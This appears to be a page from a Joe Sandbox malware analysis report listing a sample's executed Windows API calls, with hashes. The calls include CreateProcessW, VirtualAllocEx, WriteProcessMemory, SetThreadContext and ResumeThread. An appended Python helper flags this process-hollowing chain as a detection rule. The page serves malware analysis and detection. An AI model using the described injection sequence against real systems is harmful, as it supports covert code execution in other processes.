                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 029535F3
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 53a0e6bbcde1d81f6aa4f63dcda4d43395be1cc28ccdab3bc2684b5ee616821f
                                          • Instruction ID: 556e9d8d1a360b5ab4764756efb0c81d743fe76594e56e0cc1dd970692c08d23
                                          • Opcode Fuzzy Hash: 53a0e6bbcde1d81f6aa4f63dcda4d43395be1cc28ccdab3bc2684b5ee616821f
                                          • Instruction Fuzzy Hash: B85107B1A01329DFDB61DF95C880BDDBBB5BF48314F1580DAE908A7210DB719A89CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 029535F3
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 3c8910b72c22b69df03f2d11f7d51847e63baeaf9e737c974782b6a95c73cff8
                                          • Instruction ID: f0c4a2607bebe722f988442007b2dfd19b834ed37e7544c9163eafd5cedbf0d8
                                          • Opcode Fuzzy Hash: 3c8910b72c22b69df03f2d11f7d51847e63baeaf9e737c974782b6a95c73cff8
                                          • Instruction Fuzzy Hash: DA51F671A01329DFDB60DF99C880BDDBBB5BF48314F15809AE908B7250DB719A89CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00F45661
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: acdbb20da807f52217b866cc27881dc00c379d541423ae40cfef9d08ba61fddf
                                          • Instruction ID: f8665f13eda878adaa007422d7d53fa6ebac5ae00822e609aaa53de712a6f317
                                          • Opcode Fuzzy Hash: acdbb20da807f52217b866cc27881dc00c379d541423ae40cfef9d08ba61fddf
                                          • Instruction Fuzzy Hash: 6C410271D00718CFDB20DFA9C884BDEBBB1BF88704F25806AD419AB251DB75594ACF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00F45661
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 1c03a97b0881c4f14385df1df432900669e3cea2ea96b29ff6ab8f0c4a2b717b
                                          • Instruction ID: 4ac78f840e2e8cea5e983a72307967e9984ab9914f13cc6fd95d9e652707198e
                                          • Opcode Fuzzy Hash: 1c03a97b0881c4f14385df1df432900669e3cea2ea96b29ff6ab8f0c4a2b717b
                                          • Instruction Fuzzy Hash: 88411271D00718CFDB20EFA9C844B8EBBB5BF88304F618069D519AB251DB756946CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02953AD5
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 2fff8220ea375776146e248aa63b72f0cc86f43ed474827bde5e929f0fb443e6
                                          • Instruction ID: b6c9ca28041c7aa65f41bb9801e2bf421e63ef99bc7cf3bee1d8e2b6bd44bf6a
                                          • Opcode Fuzzy Hash: 2fff8220ea375776146e248aa63b72f0cc86f43ed474827bde5e929f0fb443e6
                                          • Instruction Fuzzy Hash: DD2119B1A003599FCB10CFAAD885BDEBBF4FF48314F108469E919A7340D774A945CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02953AD5
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 9fd4821bafa3740cfaadb02428e89c4d4159f4cbc01ac9c707378feceb94ba52
                                          • Instruction ID: 454776727c4393d6b9a0582df8331e7a00570950bee560613ea16cdedde22a20
                                          • Opcode Fuzzy Hash: 9fd4821bafa3740cfaadb02428e89c4d4159f4cbc01ac9c707378feceb94ba52
                                          • Instruction Fuzzy Hash: D221E6B1A003599FCB10CF9AD885BDEBBF4FF48314F10846AE919A7340D774A544CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F4BF27
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: cc1c3d5cfbfb9a4d563c242adaafe5fe07c5652bf7cd777f869b329088fc8e69
                                          • Instruction ID: ee22c1d82eb8790dee1f2512847ab48d2348daa208125a6dc82af95bd007376d
                                          • Opcode Fuzzy Hash: cc1c3d5cfbfb9a4d563c242adaafe5fe07c5652bf7cd777f869b329088fc8e69
                                          • Instruction Fuzzy Hash: AA2100B5D00249AFDB10CFA9D884ADEFBF4EB48320F14801AE919A7311C378A944DFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F4BF27
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 0f858c5e5f546d6e80ff334340801489c511f1f3f882d50a2feda6ca74b3c88e
                                          • Instruction ID: 30bbdedd4d6463e52ee8c3d0b18de7ff753ca2464ff0bd246d090005c7f68efd
                                          • Opcode Fuzzy Hash: 0f858c5e5f546d6e80ff334340801489c511f1f3f882d50a2feda6ca74b3c88e
                                          • Instruction Fuzzy Hash: 5521C4B5D00209AFDB10CFAAD884ADEFBF9EB48324F14841AE915A7311D374A944DFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 02953887
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          • Opcode ID: fcd1859688aa52b1411f8445502c823ea78c5daf908ea791aad98e9fcb75c640
                                          • Instruction ID: 32999370b7a7295139ea7e01d3da5401d3bde00efa308e3846f86fcc83e20e31
                                          • Opcode Fuzzy Hash: fcd1859688aa52b1411f8445502c823ea78c5daf908ea791aad98e9fcb75c640
                                          • Instruction Fuzzy Hash: D72129B1E006199BCB14CF9AD845BDEFBF8BB48214F148169E519A3340D778A9448FA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0295394F
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 3d593363d54ea4d9d3cd86183dab12852d9ce8110acd12575afef6d0ffc0e3c0
                                          • Instruction ID: 8649adbee3b8c503196cc95e32e9863de51d2a8f3b5cd89dbdcefb5033955f92
                                          • Opcode Fuzzy Hash: 3d593363d54ea4d9d3cd86183dab12852d9ce8110acd12575afef6d0ffc0e3c0
                                          • Instruction Fuzzy Hash: 9021D0B19002599FCB10CF9AD884ADEFBF4FF48320F10846AE918A7250D374A544CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0295394F
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 7efff3c29bea7c42b31550b163e9772f0d3e02a00dbfd7d31214214624c18f7f
                                          • Instruction ID: 5a409c398b39e5e4436ad789e8c2dacb6ecff021d79d33be4a042d31f3571980
                                          • Opcode Fuzzy Hash: 7efff3c29bea7c42b31550b163e9772f0d3e02a00dbfd7d31214214624c18f7f
                                          • Instruction Fuzzy Hash: 2D21F3B1900259DFCB10CF9AD884ADEFBF4FF48320F14846AE918A3200D334A544CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 02953887
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          • Opcode ID: af541592a629b219d74dbff9f7b0f4bc7f5e5414be452e18728ed6b5f15bee37
                                          • Instruction ID: 514a3c0b3e68b5b346aa106defed82c1b96a8a79cea44f24c90b5f60afd68b41
                                          • Opcode Fuzzy Hash: af541592a629b219d74dbff9f7b0f4bc7f5e5414be452e18728ed6b5f15bee37
                                          • Instruction Fuzzy Hash: 862138B1E006199FCB14CF9AD845BDEFBF8BB48224F14816AD518A3340D778A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F49849,00000800,00000000,00000000), ref: 00F49A5A
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 17dc9f4f4548c643f66c5d1c6a260978bc577f0828d902101a47603844730618
                                          • Instruction ID: 8206a58e86793f80065c0106418cfcbe8e960ea24b63f65865fd527a6928dc9d
                                          • Opcode Fuzzy Hash: 17dc9f4f4548c643f66c5d1c6a260978bc577f0828d902101a47603844730618
                                          • Instruction Fuzzy Hash: 201106B2D042099FCB10CF9AD444BDEFBF4AB48324F14842AE915A7200C3B4A945CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F49849,00000800,00000000,00000000), ref: 00F49A5A
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 80907885167014fe5b9bca251ce43cdd1d879cf34d036ab1cb56666139687373
                                          • Instruction ID: 0c353029d5b4b993fa3e04852873eaebb92ffe4b45e53bde7bf61539d9ce81d3
                                          • Opcode Fuzzy Hash: 80907885167014fe5b9bca251ce43cdd1d879cf34d036ab1cb56666139687373
                                          • Instruction Fuzzy Hash: 601117B6D042499FDB10CFA9D444ADEFBF4EB88320F14842AE455A7200C374A546CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02953A0B
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: dcc5bf96234c5e27c3ae4cc9e28ae71841bd1ba978c10a8dbf8a7724a348d82a
                                          • Instruction ID: 728a678c2d9999573c3cc499e9ece4d393e2bd8a3f7b76ca3c56c15fe9c14eab
                                          • Opcode Fuzzy Hash: dcc5bf96234c5e27c3ae4cc9e28ae71841bd1ba978c10a8dbf8a7724a348d82a
                                          • Instruction Fuzzy Hash: B21116B5900259AFCB20DF9AD884BDFBFF8FB48324F108459E529A7210C735A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02953A0B
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 20aff84977dda3c601ddf2cf364f9fda3e89465da77bd756d298293c50d1e2dc
                                          • Instruction ID: c21b5b1150f4da4df726f843cd6cf67cc95b20fd778292c8c29f77cafe054161
                                          • Opcode Fuzzy Hash: 20aff84977dda3c601ddf2cf364f9fda3e89465da77bd756d298293c50d1e2dc
                                          • Instruction Fuzzy Hash: 561113B59002499FCB20CF9AD884BDEBBF8EB48324F108459E529A7210C335A544CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00F497CE
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: d828399c02c17f4678bf2f3ea9d83f17ecab14bcf7e70e04db7a25cf319a36cb
                                          • Instruction ID: 8e8c7083c356893dd3f898360926983e1167ae4b96131a2b01e9310a9ed722e8
                                          • Opcode Fuzzy Hash: d828399c02c17f4678bf2f3ea9d83f17ecab14bcf7e70e04db7a25cf319a36cb
                                          • Instruction Fuzzy Hash: 9511D2B5D046498FCB20CF9AD444ADFFBF5AF88324F14855AD819A7600C3B5A545CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 7b8a7fe439c0f07c3398f1268d68697641ed4fe842b81095555f3c46373c9f62
                                          • Instruction ID: adec52111dd3f8832073b127b4436850f1348a10b87fe6e4fef71c80883760e7
                                          • Opcode Fuzzy Hash: 7b8a7fe439c0f07c3398f1268d68697641ed4fe842b81095555f3c46373c9f62
                                          • Instruction Fuzzy Hash: DC1148B19002089FCB20CF99D584BDEFBF8EB48324F108459D919A3300C774A544CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 029545A5
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 03c1961212ef88a603b5eff1820303554e17b03e6fcbe352462224283c4f051a
                                          • Instruction ID: cc76609d8135427ee00cd101f50008a81db6d1840e493360b7b5159214693e84
                                          • Opcode Fuzzy Hash: 03c1961212ef88a603b5eff1820303554e17b03e6fcbe352462224283c4f051a
                                          • Instruction Fuzzy Hash: 021103B59003599FCB20CF9AD888BDFFBF8EB48324F108459E815A7600C374A984CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 029545A5
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: bd2408ee2138c898c6b08d0d24df2400587a26c6be954ec4642653e597f52d9c
                                          • Instruction ID: 208546d67e1194250852150b15da84bdbd2d842366f941b6432c90016ae66232
                                          • Opcode Fuzzy Hash: bd2408ee2138c898c6b08d0d24df2400587a26c6be954ec4642653e597f52d9c
                                          • Instruction Fuzzy Hash: 321103B59003499FCB20CF9AD888BDEFBF8EB48324F108459E815A7600C374A584CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: f38768780b62bd2499ff303125ff6cce72954e5a6b10da617cfca5052148de4b
                                          • Instruction ID: d47c165f853b27f22e90507df37ef1119d19c6606351c95d774de5af48cb217d
                                          • Opcode Fuzzy Hash: f38768780b62bd2499ff303125ff6cce72954e5a6b10da617cfca5052148de4b
                                          • Instruction Fuzzy Hash: 661115B19002198FCB20DF9AD584BDEFBF8EB48324F108459D919A7300C774A544CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000019.00000002.428224179.00000000054C0000.00000040.00000001.sdmp, Offset: 054C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe637c87c9ac9cf7dbbf2c3bca05236cc7d2059ad884b6ef787f077bb18b860d
                                          • Instruction ID: 871b66086a9426396f26d4c12d2af6db1836de55a65988b10fab30e19f233b51
                                          • Opcode Fuzzy Hash: fe637c87c9ac9cf7dbbf2c3bca05236cc7d2059ad884b6ef787f077bb18b860d
                                          • Instruction Fuzzy Hash: F211A334B04104ABCBB5AB7988506FF7AABBFC5760F1585AEE906C7389DB30C91187D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000019.00000002.428224179.00000000054C0000.00000040.00000001.sdmp, Offset: 054C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb072592d0b53cf0854425ff79ed6db45fe4151411bda4b1c37252061f33bd18
                                          • Instruction ID: cd43afbf44f50f89deb4b605f3946cd1d478c160b8cb6ac090c59122c14eaab4
                                          • Opcode Fuzzy Hash: fb072592d0b53cf0854425ff79ed6db45fe4151411bda4b1c37252061f33bd18
                                          • Instruction Fuzzy Hash: A1E01A74D0420CEFCB44EFE8E8052AEBBF4FB48300F1046AAC918A3300D7701A01CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%
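The executed functions listed above for the 02950000 region of process 0x19 together form the classic RunPE / process-hollowing call chain (CreateProcessW, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, SetThreadContext, ResumeThread), which is what the report's "Injects a PE file into a foreign processes" signature is built on. The following triage helper is an added example and is not part of the Joe Sandbox report or of the sample itself: it parses entries in the report's own text format, groups the API references by memory-dump region, and flags a region only when every call of the chain is present. The SAMPLE block is a constructed, trimmed copy of entries visible on this page; the rule name HOLLOWING_CHAIN and the API-ID fallback (used because the page's ResumeThread entry carries no API bullet) are this example's assumptions, not a Joe Sandbox feature.

```python
"""Group a Joe Sandbox function listing by dump region and flag the
RunPE-style injection chain. Added example; not the report's own code."""
import re
from collections import defaultdict

# "• CreateProcessW.KERNELBASE(?,?,...), ref: 029535F3"
API_RE = re.compile(r"•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
# "• Source File: ....sdmp, Offset: 02950000, based on PE: false"
SRC_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")

# Assumption: the chain a hollowing loader needs. Listed in the order it is
# normally executed; the report only gives code addresses, not call order.
HOLLOWING_CHAIN = ("CreateProcessW", "VirtualAllocEx", "WriteProcessMemory",
                   "SetThreadContext", "ResumeThread")

# Constructed sample: entries copied from this page, trimmed to the fields used.
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 029535F3
Memory Dump Source
• Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
Similarity
• API ID: CreateProcess
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02953A0B
Memory Dump Source
• Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02953AD5
Memory Dump Source
• Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
APIs
• SetThreadContext.KERNELBASE(?,00000000), ref: 02953887
Memory Dump Source
• Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
APIs
Memory Dump Source
• Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
Similarity
• API ID: ResumeThread
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00F497CE
Memory Dump Source
• Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
"""


def parse_report(text):
    """Split the listing into per-function entries; each starts at an 'APIs' line."""
    entries, cur = [], None
    for raw in text.splitlines():
        s = raw.strip()
        if s == "APIs":
            if cur is not None:
                entries.append(cur)
            cur = {"apis": [], "offset": None, "api_id": ""}
            continue
        if cur is None:
            continue
        m = API_RE.match(s)
        if m:
            api, module, _args, ref = m.groups()
            cur["apis"].append((api, module, int(ref, 16)))
            continue
        m = SRC_RE.search(s)
        if m:
            cur["offset"] = int(m.group(1), 16)
            continue
        if s.startswith("• API ID:"):
            cur["api_id"] = s.split(":", 1)[1].strip()
    if cur is not None:
        entries.append(cur)
    return entries


def group_by_region(entries):
    """Map dump-region offset -> [(api, module, ref_or_None), ...]."""
    regions = defaultdict(list)
    for e in entries:
        if e["offset"] is None:
            continue
        calls = list(e["apis"])
        if not calls and e["api_id"]:
            # Fallback (assumption): with no API bullets, accept an API ID token
            # only if it is literally one of the names the rule watches.
            calls = [(t, None, None) for t in e["api_id"].split("$")
                     if t in HOLLOWING_CHAIN]
        regions[e["offset"]].extend(calls)
    return dict(regions)


def detect_hollowing(regions):
    """Return {offset: [(api, ref), ...]} for regions holding the whole chain."""
    hits = {}
    for offset, calls in regions.items():
        seen = {api for api, _, _ in calls}
        if all(api in seen for api in HOLLOWING_CHAIN):
            chain = [(api, ref) for api, _, ref in calls if api in HOLLOWING_CHAIN]
            chain.sort(key=lambda c: (c[1] is None, c[1] or 0))  # by code address
            hits[offset] = chain
    return hits


if __name__ == "__main__":
    for off, chain in detect_hollowing(group_by_region(parse_report(SAMPLE))).items():
        print(f"region {off:08X}: hollowing chain present")
        for api, ref in chain:
            print(f"  {api:20s} ref={ref:08X}" if ref is not None else f"  {api:20s} ref=?")
```

A region is flagged only when all five calls are found in it, so the 00F40000 region (GetModuleHandleW, LoadLibraryExW, DuplicateHandle) is not reported even though those calls also appear in loaders; the chain is printed by code address, which is the order the calls sit in the dumped code rather than the order they ran.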

                                          Non-executed Functions